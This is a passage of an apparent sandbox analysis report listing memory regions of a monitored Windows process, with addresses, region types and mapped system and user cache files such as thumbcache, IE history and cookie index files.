monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002210000" filename = "" Region: id = 564 start_va = 0x2220000 end_va = 0x229dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002220000" filename = "" Region: id = 565 start_va = 0x22a0000 end_va = 0x239ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022a0000" filename = "" Region: id = 566 start_va = 0x23a0000 end_va = 0x23e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023a0000" filename = "" Region: id = 567 start_va = 0x23f0000 end_va = 0x23f3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023f0000" filename = "" Region: id = 568 start_va = 0x2400000 end_va = 0x2407fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002400000" filename = "" Region: id = 569 start_va = 0x2410000 end_va = 0x2411fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "stobject.dll.mui" filename = "\\Windows\\System32\\en-US\\stobject.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\stobject.dll.mui") Region: id = 570 start_va = 0x2420000 end_va = 0x251ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002420000" filename = "" Region: id = 571 start_va = 0x2520000 end_va = 0x2520fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_1024.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_1024.db") Region: id = 572 start_va = 0x2540000 end_va = 0x2540fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_1024.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_1024.db") Region: id = 573 start_va = 0x2550000 end_va = 0x255ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012021092320210924\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\mshist012021092320210924\\index.dat") Region: id = 574 start_va = 0x2560000 end_va = 0x2573fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 575 start_va = 0x2580000 end_va = 0x2583fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002580000" filename = "" Region: id = 576 start_va = 0x2590000 end_va = 0x2590fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002590000" filename = "" Region: id = 577 start_va = 0x25a0000 end_va = 0x25a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025a0000" filename = "" Region: id = 578 start_va = 0x25b0000 end_va = 0x25b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 579 start_va = 0x25c0000 end_va = 0x26bffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_32.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_32.db") Region: id = 580 start_va = 0x26c0000 end_va = 0x26c0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_sr.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_sr.db") Region: id = 581 start_va = 0x26d0000 end_va = 0x26d0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 582 start_va = 0x26e0000 end_va = 0x26e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026e0000" filename = "" Region: id = 583 start_va = 0x26f0000 end_va = 0x26f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026f0000" filename = "" Region: id = 584 start_va = 0x2700000 end_va = 0x2700fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002700000" filename = "" Region: id = 585 start_va = 0x2710000 end_va = 0x2710fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 586 start_va = 0x2720000 end_va = 0x2728fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002720000" filename = "" Region: id = 587 start_va = 0x2730000 end_va = 0x2730fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002730000" filename = "" Region: id = 588 start_va = 0x2740000 end_va = 0x2756fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000007.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000007.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000007.db") Region: id = 589 start_va = 0x2760000 end_va = 0x2760fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002760000" filename = "" Region: id = 590 start_va = 0x2770000 end_va = 0x27effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002770000" filename = "" Region: id = 591 start_va = 0x27f0000 end_va = 0x27f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000027f0000" filename = "" Region: id = 592 start_va = 0x2800000 end_va = 0x280efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wscui.cpl.mui" filename = "\\Windows\\System32\\en-US\\wscui.cpl.mui" (normalized: "c:\\windows\\system32\\en-us\\wscui.cpl.mui") Region: id = 593 start_va = 0x2810000 end_va = 0x2810fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mpr.dll.mui" filename = "\\Windows\\System32\\en-US\\mpr.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mpr.dll.mui") Region: id = 594 start_va = 0x2820000 end_va = 0x2821fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002820000" filename = "" Region: id = 595 start_va = 0x2830000 end_va = 0x2830fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "hcproviders.dll.mui" filename = "\\Windows\\System32\\en-US\\hcproviders.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\hcproviders.dll.mui") Region: id = 596 start_va = 0x2840000 end_va = 0x2844fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "actioncenter.dll.mui" filename = "\\Windows\\System32\\en-US\\ActionCenter.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\actioncenter.dll.mui") Region: id = 597 start_va = 0x2850000 end_va = 0x2853fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002850000" filename = "" Region: id = 598 start_va = 0x2860000 end_va = 0x286ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002860000" filename = "" Region: id = 599 start_va = 0x2870000 end_va = 0x2873fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 600 start_va = 0x2880000 end_va = 0x28affff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000e.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000e.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000e.db") Region: id = 601 start_va = 0x28b0000 end_va = 0x28b3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 602 start_va = 0x28c0000 end_va = 0x28c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000028c0000" filename = "" Region: id = 603 start_va = 0x28d0000 end_va = 0x28d4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "explorerframe.dll.mui" filename = "\\Windows\\System32\\en-US\\explorerframe.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\explorerframe.dll.mui") Region: id = 604 start_va = 0x28e0000 end_va = 0x28e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000028e0000" filename = "" Region: id = 605 start_va = 0x28f0000 end_va = 0x28f3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000028f0000" filename = "" Region: id = 606 start_va = 0x2900000 end_va = 0x2901fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002900000" filename = "" Region: id = 607 start_va = 0x2910000 end_va = 0x298ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002910000" filename = "" Region: id = 608 start_va = 0x2990000 end_va = 0x2990fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002990000" filename = "" Region: id = 609 start_va = 0x29a0000 end_va = 0x29d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029a0000" filename = "" Region: id = 610 start_va = 0x29e0000 end_va = 0x29e0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_1024.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_1024.db") Region: id = 611 start_va = 0x29f0000 end_va = 0x29f0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_sr.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_sr.db") Region: id = 612 start_va = 0x2a00000 end_va = 0x2a00fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 613 start_va = 0x2a10000 end_va = 0x2a10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a10000" filename = "" Region: id = 614 start_va = 0x2a20000 end_va = 0x2a20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a20000" filename = "" Region: id = 615 start_va = 0x2a30000 end_va = 0x2a30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a30000" filename = "" Region: id = 616 start_va = 0x2a40000 end_va = 0x2abffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a40000" filename = "" Region: id = 617 start_va = 0x2ac0000 end_va = 0x2b25fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 618 start_va = 0x2b30000 end_va = 0x2b30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b30000" filename = "" Region: id = 619 start_va = 0x2b40000 end_va = 0x2b40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b40000" filename = "" Region: id = 620 start_va = 0x2b50000 end_va = 0x2b50fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_sr.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_sr.db") Region: id = 621 start_va = 0x2b60000 end_va = 0x2b60fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 622 start_va = 0x2b70000 end_va = 0x2beffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b70000" filename = "" Region: id = 623 start_va = 0x2bf0000 end_va = 0x351ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 624 start_va = 0x3520000 end_va = 0x3520fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003520000" filename = "" Region: id = 625 start_va = 0x3530000 end_va = 0x3530fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wdmaud.drv.mui" filename = "\\Windows\\System32\\en-US\\wdmaud.drv.mui" (normalized: "c:\\windows\\system32\\en-us\\wdmaud.drv.mui") Region: id = 626 start_va = 0x3540000 end_va = 0x3540fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mmdevapi.dll.mui" filename = "\\Windows\\System32\\en-US\\MMDevAPI.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mmdevapi.dll.mui") Region: id = 627 start_va = 0x3550000 end_va = 0x3551fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003550000" filename = "" Region: id = 628 start_va = 0x3560000 end_va = 0x3566fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "authui.dll.mui" filename = "\\Windows\\System32\\en-US\\authui.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\authui.dll.mui") Region: id = 629 start_va = 0x3570000 end_va = 0x357dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui") Region: id = 630 start_va = 0x35a0000 end_va = 0x361ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035a0000" filename = "" Region: id = 631 start_va = 0x3620000 end_va = 0x3621fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003620000" filename = "" Region: id = 632 start_va = 0x3630000 end_va = 0x3631fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003630000" filename = "" Region: id = 633 start_va = 0x3640000 end_va = 0x3643fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 634 start_va = 0x3650000 end_va = 0x3650fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003650000" filename = "" Region: id = 635 start_va = 0x3660000 end_va = 0x3660fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sndvolsso.dll.mui" filename = "\\Windows\\System32\\en-US\\sndvolsso.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\sndvolsso.dll.mui") Region: id = 636 start_va = 0x3670000 end_va = 0x3671fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003670000" filename = "" Region: id = 637 start_va = 0x3680000 end_va = 0x3681fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003680000" filename = "" Region: id = 638 start_va = 0x3690000 end_va = 0x3693fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 639 start_va = 0x36a0000 end_va = 0x36a0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{40fc8d7d-05ed-4feb-b03b-6c100659ef5c}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{40FC8D7D-05ED-4FEB-B03B-6C100659EF5C}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{40fc8d7d-05ed-4feb-b03b-6c100659ef5c}.2.ver0x0000000000000001.db") Region: id = 640 start_va = 0x36b0000 end_va = 0x36b3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 641 start_va = 0x36c0000 end_va = 0x36c0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{228385d3-b646-481b-b0de-f0c3a58f5423}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{228385D3-B646-481B-B0DE-F0C3A58F5423}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{228385d3-b646-481b-b0de-f0c3a58f5423}.2.ver0x0000000000000001.db") Region: id = 642 start_va = 0x36d0000 end_va = 0x36d3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 643 start_va = 0x36e0000 end_va = 0x36e0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{87178f01-581a-45f0-9991-3f918faa83f1}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{87178F01-581A-45F0-9991-3F918FAA83F1}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{87178f01-581a-45f0-9991-3f918faa83f1}.2.ver0x0000000000000001.db") Region: id = 644 start_va = 0x36f0000 end_va = 0x36f3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 645 start_va = 0x3700000 end_va = 0x3701fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003700000" filename = "" Region: id = 646 start_va = 0x3710000 end_va = 0x3711fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003710000" filename = "" Region: id = 647 start_va = 0x3720000 end_va = 0x372ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 648 start_va = 0x3780000 end_va = 0x3780fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{c353f91e-d25f-48f0-a2cd-9f60b2681e9a}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{C353F91E-D25F-48F0-A2CD-9F60B2681E9A}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{c353f91e-d25f-48f0-a2cd-9f60b2681e9a}.2.ver0x0000000000000001.db") Region: id = 649 start_va = 0x3790000 end_va = 0x3793fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 650 start_va = 0x37a0000 end_va = 0x37a0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{2f368d22-02bf-4413-97d1-c886cb140911}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{2F368D22-02BF-4413-97D1-C886CB140911}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{2f368d22-02bf-4413-97d1-c886cb140911}.2.ver0x0000000000000001.db") Region: id = 651 start_va = 0x37b0000 end_va = 0x37fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000037b0000" filename = "" Region: id = 652 start_va = 0x3830000 end_va = 0x3830fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003830000" filename = "" Region: id = 653 start_va = 0x3890000 end_va = 0x3890fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "alttab.dll.mui" filename = "\\Windows\\System32\\en-US\\AltTab.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\alttab.dll.mui") Region: id = 654 start_va = 0x38a0000 end_va = 0x391ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000038a0000" filename = "" Region: id = 655 start_va = 0x3920000 end_va = 0x3921fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003920000" filename = "" Region: id = 656 start_va = 0x3930000 end_va = 0x3934fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pnidui.dll.mui" filename = "\\Windows\\System32\\en-US\\pnidui.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\pnidui.dll.mui") Region: id = 657 start_va = 0x3940000 end_va = 0x3940fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003940000" filename = "" Region: id = 658 start_va = 0x3950000 end_va = 0x3951fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003950000" filename = "" Region: id = 659 start_va = 0x3960000 end_va = 0x3967fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 660 start_va = 0x3970000 end_va = 0x3970fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003970000" filename = "" Region: id = 661 start_va = 0x3990000 end_va = 0x3997fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "urlmon.dll.mui" filename = "\\Windows\\System32\\en-US\\urlmon.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\urlmon.dll.mui") Region: id = 662 start_va = 0x39a0000 end_va = 0x39a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000039a0000" filename = "" Region: id = 663 start_va = 0x3a00000 end_va = 0x3a00fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a00000" filename = "" Region: id = 664 start_va = 0x3a10000 end_va = 0x3a8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a10000" filename = "" Region: id = 665 start_va = 0x3a90000 end_va = 0x3a90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a90000" filename = "" Region: id = 666 start_va = 0x3ad0000 end_va = 0x3b4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ad0000" filename = "" Region: id = 667 start_va = 0x3b60000 end_va = 0x3b61fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003b60000" filename = "" Region: id = 668 start_va = 0x3b70000 end_va = 0x3b71fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003b70000" filename = "" Region: id = 669 start_va = 0x3b80000 end_va = 0x3b81fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003b80000" filename = "" Region: id = 670 start_va = 0x3b90000 end_va = 0x3b90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll") Region: id = 671 start_va = 0x3ba0000 end_va = 0x3ba1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ba0000" filename = "" Region: id = 672 start_va = 0x3bb0000 end_va = 0x3bb6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "bthprops.cpl.mui" filename = "\\Windows\\System32\\en-US\\bthprops.cpl.mui" (normalized: "c:\\windows\\system32\\en-us\\bthprops.cpl.mui") Region: id = 673 start_va = 0x3c40000 end_va = 0x3c41fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c40000" filename = "" Region: id = 674 start_va = 0x3c50000 end_va = 0x3c51fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c50000" filename = "" Region: id = 675 start_va = 0x3c60000 end_va = 0x3c61fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c60000" filename = "" Region: id = 676 start_va = 0x3c70000 end_va = 0x3c98fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fxsresm.dll.mui" filename = "\\Windows\\System32\\en-US\\FXSRESM.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fxsresm.dll.mui") Region: id = 677 start_va = 0x3cb0000 end_va = 0x3cb0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003cb0000" filename = "" Region: id = 678 start_va = 0x3cd0000 end_va = 0x3d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cd0000" filename = "" Region: id = 679 start_va = 0x3d50000 end_va = 0x3f4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 680 start_va = 0x3f80000 end_va = 0x3ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f80000" filename = "" Region: id = 681 start_va = 0x4040000 end_va = 0x40bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004040000" filename = "" Region: id = 682 start_va = 0x4100000 end_va = 0x417ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004100000" filename = "" Region: id = 683 start_va = 0x41a0000 end_va = 0x421ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041a0000" filename = "" Region: id = 684 start_va = 0x4270000 end_va = 0x42effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004270000" filename = "" Region: id = 685 start_va = 0x4310000 end_va = 0x438ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004310000" filename = "" Region: id = 686 start_va = 0x4390000 end_va = 0x56e4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 687 start_va = 0x56f0000 end_va = 0x5af2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000056f0000" filename = "" Region: id = 688 start_va = 0x5b20000 end_va = 0x5b9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005b20000" filename = "" Region: id = 689 start_va = 0x5bc0000 end_va = 0x5c3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005bc0000" filename = "" Region: id = 690 start_va = 0x5c50000 end_va = 0x5ccffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005c50000" filename = "" Region: id = 691 start_va = 0x5ce0000 end_va = 0x5ce0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_1024.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_1024.db") Region: id = 692 start_va = 0x5cf0000 end_va = 0x5cf0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_sr.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_sr.db") Region: id = 693 start_va = 0x5d00000 end_va = 0x5d00fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 694 start_va = 0x5d20000 end_va = 0x5d9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005d20000" filename = "" Region: id = 695 start_va = 0x5de0000 end_va = 0x5e5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005de0000" filename = "" Region: id = 696 start_va = 0x5e60000 end_va = 